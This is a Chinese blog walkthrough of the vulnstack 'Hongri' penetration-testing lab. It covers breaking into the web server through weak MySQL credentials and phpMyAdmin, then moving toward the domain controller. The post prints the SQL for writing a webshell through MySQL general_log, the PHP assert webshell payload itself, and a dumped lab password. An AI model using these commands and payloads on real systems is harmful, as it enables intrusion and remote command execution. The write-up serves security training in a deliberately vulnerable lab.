红日靶场全流程渗透测试

本文详细记录了一次渗透测试过程,从利用PHP探针和弱口令攻破Web服务器,通过目录扫描找到入口,到内网渗透,抓取密码并利用MS17-010漏洞攻击域控,最后通过Redis未授权获取shell并提权。整个流程展示了多种渗透技术和工具的运用。
摘要由CSDN通过智能技术生成

作者:linshao


靶场下载地址:

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/


目录

web->内网(两条路线:)

 一.php探针->mysql弱口令->目录扫描phpmyadmin->日志写shell

 二.目录扫描yxcms.rar->后台弱口令->模板写shell

内网->域控(三条线路:)

一.密码抓取->寻找域控->psexec登录域控->get

 二.主机发现->漏洞扫描->域控存在ms17-010->msf代理攻击->get

三.主机发现->端口扫描->redis未授权->getshell->正向上线msf->提权->get


一、web->内网

一.php探针->mysql弱口令->目录扫描phpmyadmin->日志写shell

1.mysql弱口令:主页尝试root/root数据库连接正常

2.目录扫描phpmyadmin:目录扫描存在phpmyadmin

3.日志写shell:

    文件导出被禁止

    测试一下确实无法导出

    select "test" into outfile "C:\\www\\phpstudy\\test.php"

    使用日志写shell

  //设置日志文件,web绝对路径可以从探针得知

SET GLOBAL general_log_file = "C:\phpStudy\WWW\1.php";set global general_log='on';      //开启日志SELECT '<?php assert($_REQUEST["cmd"]);?>';

4.访问成功:


二.目录扫描yxcms.rar->后台弱口令->模板写shell

1.目录扫描yxcms.rar:

2.登录后台,新建模板

3.访问shell,模板文件位置可在本地搭建环境得知


内网->域控

先上线cs,powershell上线失败,生成exe上线成功

一.密码抓取->寻找域控->psexec登录域控

密码抓取

Administrator/Admin@123

  • 1
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值